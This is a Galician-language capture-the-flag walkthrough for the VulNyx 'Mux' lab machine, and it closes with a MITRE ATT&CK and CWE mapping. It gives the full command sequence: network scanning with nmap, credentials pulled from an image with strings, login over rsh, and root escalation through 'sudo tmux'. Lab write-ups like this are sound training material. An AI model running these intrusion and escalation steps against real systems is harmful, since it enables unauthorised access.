Doc vulnyx mux
Máquina virtual Mux


A máquina Mux é moi interesante porque...
- Servizos r* (rsh, rlogin, rexec) - servizos legacy
- Esteganografía: credenciais ocultas en imaxe mediante strings
- Acceso por rsh en lugar de SSH
- Escalada mediante tmux con sudo
Diagrama de ataque

Fase 1 — Recopilación
sudo arp-scan --interface=eth1 192.168.56.0/24
ping -c2 IP_VulNyx_Mux -R # TTL ≃ 64 ⇒ GNU/Linux, TTL ≃ 128 ⇒ Microsoft Windows
sudo nmap -sS -Pn -T4 -p- -vvv --min-rate 5000 IP_VulNyx_Mux # 80,512,513,514
whatweb IP_VulNyx_Mux
curl -I IP_VulNyx_Mux
Fase 2 — Análise
# Portos 512, 513, 514 → rexec, rlogin, rsh (Remote Shell services)
# Porto 80 → HTTP
# Análise da web
firefox http://IP_VulNyx_Mux &
# Descarga de imaxe da web
wget http://IP_VulNyx_Mux/imaxe.jpg
# Análise de esteganografía na imaxe
strings imaxe.jpg
# Credenciais atopadas: lisa:[contrasinal]
Fase 3 — Explotación
# Acceso mediante rsh con credenciais atopadas
rsh lisa@IP_VulNyx_Mux
# ⇒ Conseguimos shell de usuario lisa (flag user.txt)
Fase 4 — Post‑explotación
# Enumeración de permisos sudo
sudo -l
# User lisa may run the following commands on mux:
# (root) NOPASSWD: /usr/bin/tmux
# Consulta en GTFOBins para tmux
# Explotación de tmux con sudo
sudo /usr/bin/tmux
# ⇒ Conseguimos shell de root dentro de sesión tmux
# Verificación
whoami # root
cd /root
cat root.txt # ⇒ Flag de root conseguida
Correspondencia de fases → MITRE ATT&CK — VulNyx: Mux
| Fase | Acción / Resumo | Vector principal | MITRE ATT&CK (IDs) | CWE(s) (relevantes) |
|---|---|---|---|---|
| 1. Recopilación | Descubrimento de host e servizos expostos | Scanning / descubrimento de servizos | T1595 — Active Scanning T1046 — Network Service Discovery |
CWE-200 — Information Exposure (reconnaissance) |
| 2. Análise | Extracción de credenciais mediante esteganografía | Credential Access / steganography | T1027.003 — Obfuscated Files or Information: Steganography T1552.001 — Unsecured Credentials: Credentials In Files |
CWE-312 — Cleartext Storage of Sensitive Information; CWE-522 — Insufficiently Protected Credentials |
| 3. Explotación | Acceso mediante rsh con credenciais válidas | Remote Shell / uso de contas válidas | T1021.004 — Remote Services: SSH T1078 — Valid Accounts |
CWE-798 — Use of Hard-coded Credentials (contextual) |
| 4. Post-explotación | Enumeración de permisos sudo | Discovery local | T1069 — Permission Groups Discovery T1083 — File and Directory Discovery |
CWE-200 — Information Exposure |
| Abuso de tmux con sudo para escalada de privilexios | Abuso de mecanismos de elevación | T1548.003 — Abuse Elevation Control Mechanism: Sudo and Sudo Caching T1059.004 — Command and Scripting Interpreter: Unix Shell |
CWE-269 — Improper Privilege Management; CWE-284 — Improper Access Control |